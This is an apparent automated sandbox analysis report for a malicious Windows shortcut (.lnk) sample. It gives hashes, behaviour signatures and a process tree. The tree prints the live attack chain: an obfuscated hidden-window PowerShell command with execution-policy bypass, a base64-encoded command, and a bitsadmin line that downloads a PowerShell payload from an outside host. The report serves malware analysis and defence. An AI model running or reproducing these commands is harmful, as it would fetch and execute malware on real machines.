Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk
Resource
win10v2004-20240508-en
General
-
Target
693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk
-
Size
2KB
-
MD5
693af6c78d4d741fbd604f78c4d4dfcd
-
SHA1
1369a8ec12f788b9df487e7500efcdb1aa18bb54
-
SHA256
7a8c0421b30ede4d8c087a4273a1b2a707c118a5e7db97dfc9d04c0d9dc45791
-
SHA512
acb95368819667942c435e968f930a274f3ce06b39a917c747360387c4259c71072b8f1ae2adafda32277658da84465f91c1befd493d8e4576ba6d35c229ed30
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2540 powershell.exe 2420 powershell.exe 2540 powershell.exe 2540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exepowershell.exepowershell.execmd.exedescription pid process target process PID 2220 wrote to memory of 2540 2220 cmd.exe powershell.exe PID 2220 wrote to memory of 2540 2220 cmd.exe powershell.exe PID 2220 wrote to memory of 2540 2220 cmd.exe powershell.exe PID 2540 wrote to memory of 2420 2540 powershell.exe powershell.exe PID 2540 wrote to memory of 2420 2540 powershell.exe powershell.exe PID 2540 wrote to memory of 2420 2540 powershell.exe powershell.exe PID 2420 wrote to memory of 2500 2420 powershell.exe findstr.exe PID 2420 wrote to memory of 2500 2420 powershell.exe findstr.exe PID 2420 wrote to memory of 2500 2420 powershell.exe findstr.exe PID 2540 wrote to memory of 1032 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 1032 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 1032 2540 powershell.exe cmd.exe PID 1032 wrote to memory of 2624 1032 cmd.exe bitsadmin.exe PID 1032 wrote to memory of 2624 1032 cmd.exe bitsadmin.exe PID 1032 wrote to memory of 2624 1032 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{$u='fingstr' -replace 'g','d'; $t='powershell -wi"N "hi"dDen -c { '+$u+' /s jerdolikab c:\users\*.lnk}'; $e=iex "$t"; "$e"|iex}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand IABmAGkAbgBkAHMAdAByACAALwBzACAAagBlAHIAZABvAGwAaQBrAGEAYgAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA= -inputFormat xml -outputFormat xml3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" /s jerdolikab c:\users\*.lnk4⤵PID:2500
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & bitsadmin /wrap /transfer jerdolikab /download /priority FOREGROUND "https://dkempton.com/kengur/arbojam" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\CzOcILaXokMyJi.ps1 & del C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\bitsadmin.exebitsadmin /wrap /transfer jerdolikab /download /priority FOREGROUND "https://dkempton.com/kengur/arbojam" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\CzOcILaXokMyJi.ps14⤵
- Download via BitsAdmin
PID:2624